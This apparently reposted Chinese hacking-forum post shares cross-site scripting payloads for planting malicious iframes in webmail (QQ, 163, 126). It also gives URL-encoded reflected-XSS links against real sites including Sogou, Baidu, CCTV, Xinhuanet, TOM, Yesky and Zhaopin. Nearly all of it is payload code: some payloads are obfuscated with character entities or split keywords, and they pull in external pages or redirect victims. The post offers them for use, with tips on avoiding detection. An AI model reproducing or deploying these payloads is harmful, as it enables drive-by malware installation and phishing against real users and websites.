本来准备自己有时间了公布出来，既然别人公布了，就转来，大家玩玩吧，不过这里面的javascript:document.write，和open都容易发现，如果自己能构造还是用insertAdjacentHTML方法跨站：

object.insertAdjacentHTML(sWhere, sText)第二个“HTML代码”是要插入的内容。第一个参数有四个变量，他们的名称及位置是这样的：“["beforeBegin"在开始标记前]<div id=test（开始标记）>["afterBegin"在开始标记后] 该标记中显示的文字 ["beforeEnd"在结束标记前]</div（结束标记）>["afterEnd"在结束标记后] ”

代码：

以下是引用片段： style="left:e¬xpression(document.body.insertAdjacentHTML('afterbegin','<iframe width=200 height=200 src=http://52cmd.cn/></iframe>'))"

最新QQ 163 126 等邮箱跨站挂马代码

QQ邮件:

以下是引用片段： <img src=javascript:document.write('<Iframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E</iframe%3E')>

163邮件:

以下是引用片段： <img src=j        avascript:document.write('%3CIframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E%3C/iframe%3E')>

126邮件 也适用与Q邮箱:

以下是引用片段： <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x64ocument&#x2ewrite&#x28&#x27&#x3cIframe%20src=http://hi.baidu.com/jc123%20width=500%20height=550%3E&#x3c/iframe%3E')>

其他邮箱请参考hackest&雕牌 [H.S.T]的“对国内主流邮箱的跨站测试”一文

另外是一些跨站漏洞（作者在另一主题中提交被管理人员合并进来）
Sogou：

以下是引用片段： http://www.sogou.com/web?query=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%22%20%77%69%64%74%68%3D%22%39%30%30%22%20%68%65%69%67%68%74%3D%22%31%35%30%30%22%3E%3C%2F%69%66%72%61%6D%65%3E

OpenV:

以下是引用片段： http://www.openv.tv/ls.jsp?q=%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%20%77%69%64%74%68%3D%22%39%30%30%22%20%68%65%69%67%68%74%3D%22%39%30%30%22%3E&db=video

新华网视频搜索也是OpenV的

以下是引用片段： http://xinhuanet.openv.tv/search.jsp?q=%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33%3E&md=&lang=&sn=1&vd=&d=v&db=tv&s

CCTV:(好像有人发过了）

以下是引用片段： http://vsearch.cctv.com/tvsearch.jsp?q=%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33%3E

TOM:

以下是引用片段： http://search.tom.com/ci.php?word=%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%3E

百度:

以下是引用片段： http://cache.baidu.com/c?url=%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33&p=2007c64ad6c02dec05bd9b7e000000 http://www.baidu.com/s?wd=><script>window.location=('http://hi.baidu.com/jc123')</script>

163:(好像也有人发过了）

以下是引用片段： https://reg.163.com/logins.jsp?username=%22%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%69%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%63%31%32%33%3E%3C%2F%69%66%72%61%6D%65%3E%22%3C%22&password=123456

天极网：

以下是引用片段： http://search.yesky.com/search.do?stype=0&wd=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%22%20%77%69%64%74%68%3D%22%39%30%30%22%20%68%65%69%67%68%74%3D%22%31%35%30%30%22%3E%3C%2F%69%66%72%61%6D%65%3E

智联招聘:

以下是引用片段： http://student.zhaopin.com/Job/CompanyList.asp?C=%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%68%61%63%6B%31%30%30%2E%63%6E%22%20%77%69%64%74%68%3D%22%39%30%30%22%20%68%65%69%67%68%74%3D%22%31%35%30%30%22%3E%3C%2F%69%66%72%61%6D%65%